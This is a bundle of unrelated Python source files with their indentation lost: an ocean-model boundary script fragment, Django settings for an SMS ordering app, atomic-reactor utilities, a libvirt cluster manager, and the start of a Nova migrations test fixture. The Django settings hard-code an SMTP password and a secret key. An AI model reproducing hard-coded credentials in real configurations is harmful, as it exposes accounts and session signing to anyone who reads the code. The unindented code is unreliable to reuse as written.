z_v_east = 0.5 * (dst_grd.vgrid.z_w[0,:,:-1,-1] + dst_grd.vgrid.z_w[0,:,1:,-1])
z_u_west = 0.5 * (dst_grd.vgrid.z_w[0,:,:,0] + dst_grd.vgrid.z_w[0,:,:,1])
z_v_west = 0.5 * (dst_grd.vgrid.z_w[0,:,:-1,0] + dst_grd.vgrid.z_w[0,:,1:,0])
dst_ubar_north = np.zeros(dst_u_north.shape[1])
dst_ubar_south = np.zeros(dst_u_south.shape[1])
dst_ubar_east = np.zeros(dst_u_east.shape[1])
dst_ubar_west = np.zeros(dst_u_west.shape[1])
dst_vbar_north = np.zeros(dst_v_north.shape[1])
dst_vbar_south = np.zeros(dst_v_south.shape[1])
dst_vbar_east = np.zeros(dst_v_east.shape[1])
dst_vbar_west = np.zeros(dst_v_west.shape[1])
for i in range(dst_u_north.shape[1]):
dst_ubar_north[i] = (dst_u_north[:,i] * np.diff(z_u_north[:,i])).sum() / -z_u_north[0,i]
dst_ubar_south[i] = (dst_u_south[:,i] * np.diff(z_u_south[:,i])).sum() / -z_u_south[0,i]
for i in range(dst_v_north.shape[1]):
dst_vbar_north[i] = (dst_v_north[:,i] * np.diff(z_v_north[:,i])).sum() / -z_v_north[0,i]
dst_vbar_south[i] = (dst_v_south[:,i] * np.diff(z_v_south[:,i])).sum() / -z_v_south[0,i]
for j in range(dst_u_east.shape[1]):
dst_ubar_east[j] = (dst_u_east[:,j] * np.diff(z_u_east[:,j])).sum() / -z_u_east[0,j]
dst_ubar_west[j] = (dst_u_west[:,j] * np.diff(z_u_west[:,j])).sum() / -z_u_west[0,j]
for j in range(dst_v_east.shape[1]):
dst_vbar_east[j] = (dst_v_east[:,j] * np.diff(z_v_east[:,j])).sum() / -z_v_east[0,j]
dst_vbar_west[j] = (dst_v_west[:,j] * np.diff(z_v_west[:,j])).sum() / -z_v_west[0,j]
#mask
dst_ubar_north = np.ma.masked_where(dst_grd.hgrid.mask_u[-1,:] == 0, dst_ubar_north)
dst_ubar_south = np.ma.masked_where(dst_grd.hgrid.mask_u[0,:] == 0, dst_ubar_south)
dst_ubar_east = np.ma.masked_where(dst_grd.hgrid.mask_u[:,-1] == 0, dst_ubar_east)
dst_ubar_west = np.ma.masked_where(dst_grd.hgrid.mask_u[:,0] == 0, dst_ubar_west)
dst_vbar_north = np.ma.masked_where(dst_grd.hgrid.mask_v[-1,:] == 0, dst_vbar_north)
dst_vbar_south = np.ma.masked_where(dst_grd.hgrid.mask_v[0,:] == 0, dst_vbar_south)
dst_vbar_east = np.ma.masked_where(dst_grd.hgrid.mask_v[:,-1] == 0, dst_vbar_east)
dst_vbar_west = np.ma.masked_where(dst_grd.hgrid.mask_v[:,0] == 0, dst_vbar_west)
# write data in destination file
print 'write data in destination file'
ncu.variables['ocean_time'][0] = time
ncu.variables['u_north'][0] = dst_u_north
ncu.variables['u_south'][0] = dst_u_south
ncu.variables['u_east'][0] = dst_u_east
ncu.variables['u_west'][0] = dst_u_west
ncu.variables['ubar_north'][0] = dst_ubar_north
ncu.variables['ubar_south'][0] = dst_ubar_south
ncu.variables['ubar_east'][0] = dst_ubar_east
ncu.variables['ubar_west'][0] = dst_ubar_west
ncv.variables['ocean_time'][0] = time
ncv.variables['v_north'][0] = dst_v_north
ncv.variables['v_south'][0] = dst_v_south
ncv.variables['v_east'][0] = dst_v_east
ncv.variables['v_west'][0] = dst_v_west
ncv.variables['vbar_north'][0] = dst_vbar_north
ncv.variables['vbar_south'][0] = dst_vbar_south
ncv.variables['vbar_east'][0] = dst_vbar_east
ncv.variables['vbar_west'][0] = dst_vbar_west
# close file
ncu.close()
ncv.close()
cdf.close()
|
|
# Django settings for tns_glass project.
DEBUG = False
TEMPLATE_DEBUG = DEBUG
ADMINS = (
('Nyaruka', 'code@nyaruka.com'),
)
MANAGERS = ADMINS
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3', # Add 'postgresql_psycopg2', 'postgresql', 'mysql', 'sqlite3' or 'oracle'.
'NAME': 'motome.db', # Or path to database file if using sqlite3.
'USER': '', # Not used with sqlite3.
'PASSWORD': '', # Not used with sqlite3.
'HOST': '', # Set to empty string for localhost. Not used with sqlite3.
'PORT': '', # Set to empty string for default. Not used with sqlite3.
}
}
# set the mail settings, we send throught gmail
EMAIL_HOST = 'smtp.gmail.com'
EMAIL_HOST_USER = 'website@nyaruka.com'
DEFAULT_FROM_EMAIL = 'website@nyaruka.com'
EMAIL_HOST_PASSWORD = 'passwordpassword'
EMAIL_USE_TLS = True
EMAIL_PORT = 587
# On Unix systems, a value of None will cause Django to use the same
# timezone as the operating system.
# If running in a Windows environment this must be set to the same as your
# system time zone
TIME_ZONE = 'GMT'
USER_TIME_ZONE = 'Africa/Kigali'
MODELTRANSLATION_TRANSLATION_REGISTRY = "translation"
# Language code for this installation. All choices can be found here:
# http://www.i18nguy.com/unicode/language-identifiers.html
LANGUAGE_CODE = 'en-us'
# Available languages for translation
LANGUAGES = (('en_us', "English"), ('rw', "Kinyarwanda" ), ('fr', "French"))
DEFAULT_LANGUAGE = "en_us"
DEFAULT_SMS_LANGUAGE = "rw"
SITE_ID = 1
# If you set this to False, Django will make some optimizations so as not
# to load the internationalization machinery.
USE_I18N = False
# If you set this to False, Django will not format dates, numbers and
# calendars according to the current locale
USE_L10N = False
# Absolute filesystem path to the directory that will hold user-uploaded files.
# Example: "/home/media/media.lawrence.com/media/"
MEDIA_ROOT = ''
# URL that handles the media served from MEDIA_ROOT. Make sure to use a
# trailing slash.
# Examples: "http://media.lawrence.com/media/", "http://example.com/media/"
MEDIA_URL = ''
# Absolute path to the directory static files should be collected to.
# Don't put anything in this directory yourself; store your static files
# in apps' "static/" subdirectories and in STATICFILES_DIRS.
# Example: "/home/media/media.lawrence.com/static/"
STATIC_ROOT = ''
# URL prefix for static files.
# Example: "http://media.lawrence.com/static/"
STATIC_URL = '/static/'
# URL prefix for admin static files -- CSS, JavaScript and images.
# Make sure to use a trailing slash.
# Examples: "http://foo.com/static/admin/", "/static/admin/".
ADMIN_MEDIA_PREFIX = '/static/admin/'
# Additional locations of static files
STATICFILES_DIRS = (
# Put strings here, like "/home/html/static" or "C:/www/django/static".
# Always use forward slashes, even on Windows.
# Don't forget to use absolute paths, not relative paths.
)
# List of finder classes that know how to find static files in
# various locations.
STATICFILES_FINDERS = (
'django.contrib.staticfiles.finders.FileSystemFinder',
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
'compressor.finders.CompressorFinder',
)
# Make this unique, and don't share it with anybody.
SECRET_KEY = 'bangbangrootplaydeadn7#^+-u-#1wm=y3a$-#^jps5tihx5v_@-_(kxumq_$+$5r)bxo'
# List of callables that know how to import templates from various sources.
TEMPLATE_LOADERS = (
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
'django.template.loaders.eggs.Loader',
)
TEMPLATE_CONTEXT_PROCESSORS = (
'django.contrib.auth.context_processors.auth',
'django.core.context_processors.debug',
'django.core.context_processors.i18n',
'django.core.context_processors.media',
'django.core.context_processors.static',
'django.contrib.messages.context_processors.messages',
'django.core.context_processors.request',
)
MIDDLEWARE_CLASSES = (
'django.middleware.common.CommonMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.locale.LocaleMiddleware'
)
ROOT_URLCONF = 'motome.urls'
CACHES = {
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'LOCATION': 'django-cache'
}
}
INSTALLED_APPS = (
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.sites',
'django.contrib.messages',
'django.contrib.staticfiles',
'django.contrib.markup',
'django.contrib.humanize',
'south',
# mo-betta permission management
'guardian',
# error logging
'raven.contrib.django',
# versioning of our data
'reversion',
# the django admin
'django.contrib.admin',
# debug!
'debug_toolbar',
# compress our CSS and js
'compressor',
# rapidsms
'rapidsms',
'rapidsms_httprouter',
# smartmin
'smartmin',
'modeltranslation',
'django_quickblocks',
# async tasks,
'djcelery',
# thumbnail
'sorl.thumbnail',
# user management
'smartmin.users',
# translation of messages
'nsms.text',
# console
'nsms.console',
# our locales model
'locales',
# stores
'stores',
# products
'products',
# orders
'orders',
# customers
'customers',
# landmarks
'landmarks',
# transactions
'transactions',
)
# A sample logging configuration. The only tangible logging
# performed by this configuration is to send an email to
# the site admins on every HTTP 500 error.
# See http://docs.djangoproject.com/en/dev/topics/logging for
# more details on how to customize your logging configuration.
LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'formatters': {
'verbose': {
'format': '%(levelname)s %(asctime)s %(module)s %(process)d %(thread)d %(message)s'
},
'simple': {
'format': '%(levelname)s %(message)s'
},
},
'handlers': {
'mail_admins': {
'level': 'ERROR',
'class': 'django.utils.log.AdminEmailHandler'
},
'console': {
'level': 'INFO',
'class':'logging.StreamHandler',
'formatter': 'verbose'
}
},
'loggers': {
'httprouterthread': {
'handlers': ['console'],
'level': 'INFO',
},
'django.request': {
'handlers': ['mail_admins'],
'level': 'ERROR',
'propagate': True,
},
}
}
#-----------------------------------------------------------------------------------
# Directory Configuration
#-----------------------------------------------------------------------------------
import os
PROJECT_DIR = os.path.join(os.path.abspath(os.path.dirname(__file__)))
RESOURCES_DIR = os.path.join(PROJECT_DIR, '../resources')
RESOURCES_DIR = os.path.join(PROJECT_DIR, '../resources')
FIXTURE_DIRS = (os.path.join(PROJECT_DIR, '../fixtures'),)
TESTFILES_DIR = os.path.join(PROJECT_DIR, '../testfiles')
TEMPLATE_DIRS = (os.path.join(PROJECT_DIR, '../templates'),)
STATICFILES_DIRS = (os.path.join(PROJECT_DIR, '../static'), os.path.join(PROJECT_DIR, '../media'), )
STATIC_ROOT = os.path.join(PROJECT_DIR, '../sitestatic')
MEDIA_ROOT = os.path.join(PROJECT_DIR, '../media')
MEDIA_URL = "/media/"
#-----------------------------------------------------------------------------------
# Permission Management
#-----------------------------------------------------------------------------------
# this lets us easily create new permissions across our objects
PERMISSIONS = {
'*': ('create', # can create an object
'read', # can read an object, viewing it's details
'update', # can update an object
'delete', # can delete an object,
'list'), # can view a list of the objects
# Add new object level permissions here:
# 'subjects.subject': ('csv', 'delivered', 'stopped'),
}
# assigns the permissions that each group should have
GROUP_PERMISSIONS = {
"Administrators": (
'auth.user.*',
'rapidsms_httprouter.message.*',
),
"Editors": [],
"Viewers": []
}
#-----------------------------------------------------------------------------------
# Login / Logout
#-----------------------------------------------------------------------------------
LOGIN_URL = "/users/login/"
LOGOUT_URL = "/users/logout/"
LOGIN_REDIRECT_URL = "/"
#-----------------------------------------------------------------------------------
# Guardian Configuration
#-----------------------------------------------------------------------------------
AUTHENTICATION_BACKENDS = (
'django.contrib.auth.backends.ModelBackend',
'guardian.backends.ObjectPermissionBackend',
)
ANONYMOUS_USER_ID = -1
#-----------------------------------------------------------------------------------
# Async tasks with django-celery
#-----------------------------------------------------------------------------------
import djcelery
djcelery.setup_loader()
CELERY_RESULT_BACKEND = 'database'
BROKER_BACKEND = 'redis'
BROKER_HOST = 'localhost'
BROKER_PORT = 6379
BROKER_VHOST = '10'
REDIS_PORT=6379
REDIS_HOST='localhost'
REDIS_DB=10
#-----------------------------------------------------------------------------------
# Django-Nose config
#-----------------------------------------------------------------------------------
TEST_RUNNER = 'django_nose.NoseTestSuiteRunner'
SOUTH_TESTS_MIGRATE = False
#-----------------------------------------------------------------------------------
# SMS Configs
#-----------------------------------------------------------------------------------
RAPIDSMS_TABS = []
SMS_APPS = ['public']
# change this to your specific backend for your install
DEFAULT_BACKEND = "console"
# change this to the country code for your install
DEFAULT_COUNTRY_CODE = "250"
#-----------------------------------------------------------------------------------
# Debug Toolbar
#-----------------------------------------------------------------------------------
INTERNAL_IPS = ('127.0.0.1',)
#-----------------------------------------------------------------------------------
# Crontab Settings .. uncomment if you want to use Celery's crontab-like
# functionality.
#-----------------------------------------------------------------------------------
from datetime import timedelta
CELERYBEAT_SCHEDULE = {
"runs-every-five-minutes": {
'task': 'rapidsms_httprouter.tasks.resend_errored_messages_task',
'schedule': timedelta(minutes=5),
},
}
DEBUG_TOOLBAR_CONFIG = {
'INTERCEPT_REDIRECTS': False
}
|
|
"""
Copyright (c) 2015 Red Hat, Inc
All rights reserved.
This software may be modified and distributed under the terms
of the BSD license. See the LICENSE file for details.
"""
from __future__ import print_function, unicode_literals
import json
import os
from pipes import quote
import re
import shlex
import shutil
import subprocess
import tempfile
import logging
import uuid
from atomic_reactor.constants import DOCKERFILE_FILENAME, PY2
logger = logging.getLogger(__name__)
class ImageName(object):
def __init__(self, registry=None, namespace=None, repo=None, tag=None):
self.registry = registry
self.namespace = namespace
self.repo = repo
self.tag = tag
@classmethod
def parse(cls, image_name):
result = cls()
# registry.org/namespace/repo:tag
s = image_name.split('/', 2)
if len(s) == 2:
if '.' in s[0] or ':' in s[0]:
result.registry = s[0]
else:
result.namespace = s[0]
elif len(s) == 3:
result.registry = s[0]
result.namespace = s[1]
if result.namespace == 'library':
# https://github.com/projectatomic/atomic-reactor/issues/45
logger.debug("namespace 'library' -> ''")
result.namespace = None
result.repo = s[-1]
try:
result.repo, result.tag = result.repo.rsplit(':', 1)
except ValueError:
pass
return result
def to_str(self, registry=True, tag=True, explicit_tag=False,
explicit_namespace=False):
if self.repo is None:
raise RuntimeError('No image repository specified')
result = self.repo
if tag and self.tag:
result = '{0}:{1}'.format(result, self.tag)
elif tag and explicit_tag:
result = '{0}:{1}'.format(result, 'latest')
if self.namespace:
result = '{0}/{1}'.format(self.namespace, result)
elif explicit_namespace:
result = '{0}/{1}'.format('library', result)
if registry and self.registry:
result = '{0}/{1}'.format(self.registry, result)
return result
@property
def pulp_repo(self):
return self.to_str(registry=False, tag=False).replace("/", "-")
def __str__(self):
return self.to_str(registry=True, tag=True)
def __repr__(self):
return "ImageName(image=%s)" % repr(self.to_str())
def __eq__(self, other):
return type(self) == type(other) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not self == other
def __hash__(self):
return hash(self.to_str())
def copy(self):
return ImageName(
registry=self.registry,
namespace=self.namespace,
repo=self.repo,
tag=self.tag)
def figure_out_dockerfile(absolute_path, local_path=None):
"""
try to figure out dockerfile from provided path and optionally from relative local path
this is meant to be used with git repo: absolute_path is path to git repo,
local_path is path to dockerfile within git repo
:param absolute_path:
:param local_path:
:return: tuple, (dockerfile_path, dir_with_dockerfile_path)
"""
logger.info("searching for dockerfile in '%s' (local path %s)", absolute_path, local_path)
logger.debug("abs path = '%s', local path = '%s'", absolute_path, local_path)
if local_path:
if local_path.endswith(DOCKERFILE_FILENAME):
git_df_dir = os.path.dirname(local_path)
df_dir = os.path.abspath(os.path.join(absolute_path, git_df_dir))
else:
df_dir = os.path.abspath(os.path.join(absolute_path, local_path))
else:
df_dir = os.path.abspath(absolute_path)
if not os.path.isdir(df_dir):
raise IOError("Directory '%s' doesn't exist." % df_dir)
df_path = os.path.join(df_dir, DOCKERFILE_FILENAME)
if not os.path.isfile(df_path):
raise IOError("Dockerfile '%s' doesn't exist." % df_path)
logger.debug("Dockerfile found: '%s'", df_path)
return df_path, df_dir
class CommandResult(object):
def __init__(self, logs, error=None, error_detail=None):
self._logs = logs
self._error = error
self._error_detail = error_detail
@property
def logs(self):
return self._logs
@property
def error(self):
return self._error
@property
def error_detail(self):
return self._error_detail
def is_failed(self):
return bool(self.error) or bool(self.error_detail)
def wait_for_command(logs_generator):
"""
using given generator, wait for it to raise StopIteration, which
indicates that docker has finished with processing
:return: list of str, logs
"""
# FIXME: this function is getting pretty big, let's break it down a bit
# and merge it into CommandResult
logger.info("wait_for_command")
logs = []
error = None
error_message = None
while True:
try:
parsed_item = None
item = next(logs_generator) # py2 & 3 compat
item = item.decode("utf-8")
try:
parsed_item = json.loads(item)
except ValueError:
pass
# make sure the json is an object
if isinstance(parsed_item, dict):
line = parsed_item.get("stream", "")
else:
parsed_item = None
line = item
for l in re.split(r"\r?\n", line, re.MULTILINE):
# line = line.replace("\r\n", " ").replace("\n", " ").strip()
l = l.strip()
if l:
logger.debug(l)
logs.append(item)
if parsed_item is not None:
error = parsed_item.get("error", None)
error_message = parsed_item.get("errorDetail", None)
if error:
logger.error(item.strip())
except StopIteration:
logger.info("no more logs")
break
cr = CommandResult(logs=logs, error=error, error_detail=error_message)
return cr
def backported_check_output(*popenargs, **kwargs):
"""
Run command with arguments and return its output as a byte string.
Backported from Python 2.7 as it's implemented as pure python on stdlib.
https://gist.github.com/edufelipe/1027906
"""
process = subprocess.Popen(stdout=subprocess.PIPE, *popenargs, **kwargs)
output, _ = process.communicate()
retcode = process.poll()
if retcode:
cmd = kwargs.get("args")
if cmd is None:
cmd = popenargs[0]
error = subprocess.CalledProcessError(retcode, cmd)
error.output = output
raise error
return output
def clone_git_repo(git_url, target_dir, commit=None):
"""
clone provided git repo to target_dir, optionally checkout provided commit
:param git_url: str, git repo to clone
:param target_dir: str, filesystem path where the repo should be cloned
:param commit: str, commit to checkout, SHA-1 or ref
:return: str, commit ID of HEAD
"""
commit = commit or "master"
logger.info("cloning git repo '%s'", git_url)
logger.debug("url = '%s', dir = '%s', commit = '%s'",
git_url, target_dir, commit)
# http://stackoverflow.com/questions/1911109/clone-a-specific-git-branch/4568323#4568323
# -b takes only refs, not SHA-1
cmd = ["git", "clone", "-b", commit, "--single-branch", git_url, quote(target_dir)]
logger.debug("cloning single branch '%s'", cmd)
try:
subprocess.check_call(cmd)
except subprocess.CalledProcessError as ex:
logger.warning(repr(ex))
# let's try again with plain `git clone $url && git checkout`
cmd = ["git", "clone", git_url, quote(target_dir)]
logger.debug("cloning '%s'", cmd)
subprocess.check_call(cmd)
cmd = ["git", "reset", "--hard", commit]
logger.debug("checking out branch '%s'", cmd)
subprocess.check_call(cmd, cwd=target_dir)
cmd = ["git", "rev-parse", "HEAD"]
logger.debug("getting SHA-1 of provided ref '%s'", cmd)
try:
commit_id = subprocess.check_output(cmd, cwd=target_dir) # py 2.7
except AttributeError:
commit_id = backported_check_output(cmd, cwd=target_dir) # py 2.6
commit_id = commit_id.strip()
logger.info("commit ID = %s", commit_id)
return commit_id
class LazyGit(object):
"""
usage:
lazy_git = LazyGit(git_url="...")
with lazy_git:
laze_git.git_path
or
lazy_git = LazyGit(git_url="...", tmpdir=tmp_dir)
lazy_git.git_path
"""
def __init__(self, git_url, commit=None, tmpdir=None):
self.git_url = git_url
# provided commit ID/reference to check out
self.commit = commit
# commit ID of HEAD; we'll figure this out ourselves
self._commit_id = None
self.provided_tmpdir = tmpdir
self._git_path = None
@property
def _tmpdir(self):
return self.provided_tmpdir or self.our_tmpdir
@property
def commit_id(self):
return self._commit_id
@property
def git_path(self):
if self._git_path is None:
self._commit_id = clone_git_repo(self.git_url, self._tmpdir, self.commit)
self._git_path = self._tmpdir
return self._git_path
def __enter__(self):
if not self.provided_tmpdir:
self.our_tmpdir = tempfile.mkdtemp()
def __exit__(self, exc_type, exc_val, exc_tb):
if not self.provided_tmpdir:
if self.our_tmpdir:
shutil.rmtree(self.our_tmpdir)
def escape_dollar(v):
try:
str_type = unicode
except NameError:
str_type = str
if isinstance(v, str_type):
return v.replace('$', r'\$')
else:
return v
def render_yum_repo(repo, escape_dollars=True):
repo.setdefault("name", str(uuid.uuid4().hex[:6]))
repo_name = repo["name"]
logger.info("rendering repo '%s'", repo_name)
rendered_repo = '[%s]\n' % repo_name
for key, value in repo.items():
if escape_dollars:
value = escape_dollar(value)
rendered_repo += "%s=%s\n" % (key, value)
logger.info("rendered repo: %s", repr(rendered_repo))
return rendered_repo
def process_substitutions(mapping, substitutions):
"""Process `substitutions` for given `mapping` (modified in place)
:param mapping: a dict
:param substitutions: either a dict {key: value} or a list of ["key=value"] strings
keys can use dotted notation to change to nested dicts
Note: Plugin substitutions are processed differently - they are accepted in form of
plugin_type.plugin_name.arg_name, even though that doesn't reflect the actual
structure of given mapping.
Also note: For non-plugin substitutions, additional dicts/key/value pairs
are created on the way if they're missing. For plugin substitutions, only
existing values can be changed (TODO: do we want to change this behaviour?).
"""
def parse_val(v):
# TODO: do we need to recognize numbers,lists,dicts?
if v.lower() == 'true':
return True
elif v.lower() == 'false':
return False
elif v.lower() == 'none':
return None
return v
if isinstance(substitutions, list):
# if we got a list, get a {key: val} dict out of it
substitutions = dict([s.split('=', 1) for s in substitutions])
for key, val in substitutions.items():
cur_dict = mapping
key_parts = key.split('.')
if key_parts[0].endswith('_plugins'):
_process_plugin_substitution(mapping, key_parts, val)
else:
key_parts_without_last = key_parts[:-1]
# now go down mapping, following the dotted path; create empty dicts on way
for k in key_parts_without_last:
if k in cur_dict:
if not isinstance(cur_dict[k], dict):
cur_dict[k] = {}
else:
cur_dict[k] = {}
cur_dict = cur_dict[k]
cur_dict[key_parts[-1]] = parse_val(val)
def _process_plugin_substitution(mapping, key_parts, value):
try:
plugin_type, plugin_name, arg_name = key_parts
except ValueError:
logger.error("invalid absolute path '{0}': it requires exactly three parts: "
"plugin type, plugin name, argument name (dot separated)".format(key_parts))
raise ValueError("invalid absolute path to plugin, it should be "
"plugin_type.plugin_name.argument_name")
logger.debug("getting plugin conf for '%s' with type '%s'",
plugin_name, plugin_type)
plugins_of_a_type = mapping.get(plugin_type, None)
if plugins_of_a_type is None:
logger.warning("there are no plugins with type '%s'",
plugin_type)
return
plugin_conf = [x for x in plugins_of_a_type if x['name'] == plugin_name]
plugins_num = len(plugin_conf)
if plugins_num == 1:
if arg_name not in plugin_conf[0]['args']:
logger.warning("no configuration value '%s' for plugin '%s', skipping",
arg_name, plugin_name)
return
logger.info("changing value '%s' of plugin '%s': '%s' -> '%s'",
arg_name, plugin_name, plugin_conf[0]['args'][arg_name], value)
plugin_conf[0]['args'][arg_name] = value
elif plugins_num <= 0:
logger.warning("there is no configuration for plugin '%s', skipping substitution",
plugin_name)
else:
logger.error("there is no configuration for plugin '%s'",
plugin_name)
raise RuntimeError("plugin '%s' was specified multiple (%d) times, can't pick one",
plugin_name, plugins_num)
|
|
import libvirt
import os
import string
import uuid
import xml.etree.ElementTree as ET
from cephlvc.network import ArpScraper
class Domain(object):
def __init__(self, virDomain):
self.domain = virDomain
def __getattr__(self, attr_name):
if hasattr(self.domain, attr_name):
return getattr(self.domain, attr_name)
def disk_count(self, bus=None):
targets = self.etree.findall('*/disk/target')
if not bus:
return len(targets)
count = 0
for target in targets:
if target.attrib['bus'] == bus:
count += 1
return count
@property
def etree(self):
return ET.fromstring(self.domain.XMLDesc())
@property
def volume_paths(self):
paths = []
etree = self.etree
for source in etree.findall('*/disk/source'):
paths.append(source.attrib['file'])
return paths
class Cluster(object):
def __init__(self, name, template_domain_name, virtcon):
self.name = name
self.template_domain_name = template_domain_name
self.virtcon = virtcon
def add_domain(self, data_volume_count=0, data_volume_size=0):
new_name = self.next_domain_name()
etree = self.template_domain.etree
source_volume_element = etree.find('*/disk/source')
source_volume_path = source_volume_element.attrib['file']
source_volume = self.virtcon.storageVolLookupByPath(source_volume_path)
volume = self.duplicate_volume(source_volume, "%s.img" % new_name)
domain = self.create_domain(new_name, self.template_domain.etree, volume)
disk_offset = domain.disk_count('virtio')
for x in range(0, data_volume_count):
vol_name = "%s-data-%02d.img" % (new_name, x)
dev_id = "vd%s" % string.ascii_lowercase[x + disk_offset]
volume = self.create_volume(vol_name, data_volume_size)
self.add_volume_to_domain(domain, volume, dev_id)
return domain
def add_volume_to_domain(self, domain, volume, dev_id):
xml = """
<disk type='file' device='disk'>
<driver name='qemu' type='qcow2'/>
<source file='%s'/>
<target dev='%s' bus='virtio'/>
</disk>""" % (volume.path(), dev_id)
domain.attachDeviceFlags(xml, libvirt.VIR_DOMAIN_AFFECT_CONFIG)
def create_domain(self, name, template_etree, source_volume):
etree = template_etree
etree.find("uuid").text = str(uuid.uuid4())
etree.find("name").text = name
source_volume_element = etree.find('*/disk/source')
source_volume_element.attrib['file'] = source_volume.path()
for mac in etree.findall('*/interface/mac'):
mac.attrib['address'] = self.next_mac_address()
return Domain(self.virtcon.defineXML(ET.tostring(etree)))
def create_volume(self, name, size, pool=None):
if not pool:
pool = self.virtcon.listAllStoragePools()[0]
xml = """
<volume type='file'>
<name>%s</name>
<capacity unit='bytes'>%d</capacity>
<allocation unit='bytes'>0</allocation>
<target>
<format type='qcow2'/>
</target>
</volume>
""" % (name, size * 1024 * 1024)
volume = pool.createXML(xml)
return volume
def destroy_all(self):
for d in self.domains:
self.destroy_domain(d, and_volumes=True)
def destroy_domain(self, domain, and_volumes=True):
# preloading paths because we can't get them from the domain
# once undefine is called
paths = domain.volume_paths
if domain.isActive():
domain.destroy()
domain.undefine()
if and_volumes:
for path in paths:
self.destroy_volume(path)
def destroy_volume(self, volume):
volume = self.load_volume(volume)
volume.delete()
def detach_volume(self, domain, volume):
pass
@property
def domains(self):
return [Domain(d) for d in self.virtcon.listAllDomains() if d.name().startswith(self.name)]
def duplicate_volume(self, volume, new_name):
volume = self.load_volume(volume)
template_name = volume.name()
pool = volume.storagePoolLookupByVolume()
new_xml = volume.XMLDesc().replace(template_name, new_name)
new_vol = pool.createXMLFrom(new_xml, volume)
return new_vol
def load_volume(self, volume):
if isinstance(volume, libvirt.virStorageVol):
return volume
if isinstance(volume, str):
volume_name = volume
volume = None
if volume_name.find(os.path.sep) == 0:
volume = self.virtcon.storageVolLookupByPath(volume_name)
else:
for pool in self.virtcon.listAllStoragePools():
for v in pool.listAllVolumes():
if v.name() == volume_name:
volume = v
break
return volume
def max_mac_address(self):
max_mac = 0
for d in [Domain(d) for d in self.virtcon.listAllDomains()]:
etree = d.etree
for mac in etree.findall('*/interface/mac'):
addr = int(mac.attrib['address'].replace(':', ''), 16)
if addr > max_mac:
max_mac = addr
max_mac = "%012x" % max_mac
max_mac = ":".join(max_mac[i:i+2] for i in range(0, 12, 2))
return max_mac
def next_mac_address(self, mac=None):
if mac is None:
mac = self.max_mac_address()
newmac = '%012x' % (int(mac.replace(':', ''), 16) + 1)
return ":".join(newmac[i:i+2] for i in range(0, 12, 2))
def next_domain_name(self):
return "%s-%02d" % (self.name, len(self.domains))
def print_ip_addresses(self):
mac_to_domain = {}
macs = []
for d in self.domains:
etree = d.etree
for mac in etree.findall('*/interface/mac'):
mac_to_domain[mac.attrib['address']] = d.name()
macs.append(mac.attrib['address'])
arp_scraper = ArpScraper()
addresses = arp_scraper.ip_lookup(macs)
for mac, ip in addresses:
print "%s %s" % (ip, mac_to_domain[mac])
def power_off(self):
for d in self.domains:
d.shutdown()
def power_on(self):
for d in self.domains:
d.create()
@property
def template_domain(self):
return Domain(self.virtcon.lookupByName(self.template_domain_name))
|
|
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import datetime
import iso8601
import mock
from oslo_utils.fixture import uuidsentinel as uuids
import six
from webob import exc
from nova.api.openstack.compute import migrations as migrations_v21
from nova import context
from nova import exception
from nova import objects
from nova.objects import base
from nova import test
from nova.tests.unit.api.openstack import fakes
fake_migrations = [
# in-progress live migration
{
'id': 1,
'source_node': 'node1',
'dest_node': 'node2',
'source_compute': 'compute1',
'dest_compute': 'compute2',
'dest_host': '1.2.3.4',
'status': 'running',
'instance_uuid': uuids.instance1,
'old_instance_type_id': 1,
'new_instance_type_id': 2,
'migration_type': 'live-migration',
'hidden': False,
'memory_total': 123456,
'memory_processed': 12345,
'memory_remaining': 111111,
'disk_total': 234567,
'disk_processed': 23456,
'disk_remaining': 211111,
'created_at': datetime.datetime(2012, 10, 29, 13, 42, 2),
'updated_at': datetime.datetime(2012, 10, 29, 13, 42, 2),
'deleted_at': None,
'deleted': False,
'uuid': uuids.migration1,
'cross_cell_move': False,
'user_id': None,
'project_id': None
},
# non in-progress live migration
{
'id': 2,
'source_node': 'node1',
'dest_node': 'node2',
'source_compute': 'compute1',
'dest_compute': 'compute2',
'dest_host': '1.2.3.4',
'status': 'error',
'instance_uuid': uuids.instance1,
'old_instance_type_id': 1,
'new_instance_type_id': 2,
'migration_type': 'live-migration',
'hidden': False,
'memory_total': 123456,
'memory_processed': 12345,
'memory_remaining': 111111,
'disk_total': 234567,
'disk_processed': 23456,
'disk_remaining': 211111,
'created_at': datetime.datetime(2012, 10, 29, 13, 42, 2),
'updated_at': datetime.datetime(2012, 10, 29, 13, 42, 2),
'deleted_at': None,
'deleted': False,
'uuid': uuids.migration2,
'cross_cell_move': False,
'user_id': None,
'project_id': None
},
# in-progress resize
{
'id': 4,
'source_node': 'node10',
'dest_node': 'node20',
'source_compute': 'compute10',
'dest_compute': 'compute20',
'dest_host': '5.6.7.8',
'status': 'migrating',
'instance_uuid': uuids.instance2,
'old_instance_type_id': 5,
'new_instance_type_id': 6,
'migration_type': 'resize',
'hidden': False,
'memory_total': 456789,
'memory_processed': 56789,
'memory_remaining': 45000,
'disk_total': 96789,
'disk_processed': 6789,
'disk_remaining': 96000,
'created_at': datetime.datetime(2013, 10, 22, 13, 42, 2),
'updated_at': datetime.datetime(2013, 10, 22, 13, 42, 2),
'deleted_at': None,
'deleted': False,
'uuid': uuids.migration3,
'cross_cell_move': False,
'user_id': None,
'project_id': None
},
# non in-progress resize
{
'id': 5,
'source_node': 'node10',
'dest_node': 'node20',
'source_compute': 'compute10',
'dest_compute': 'compute20',
'dest_host': '5.6.7.8',
'status': 'error',
'instance_uuid': uuids.instance2,
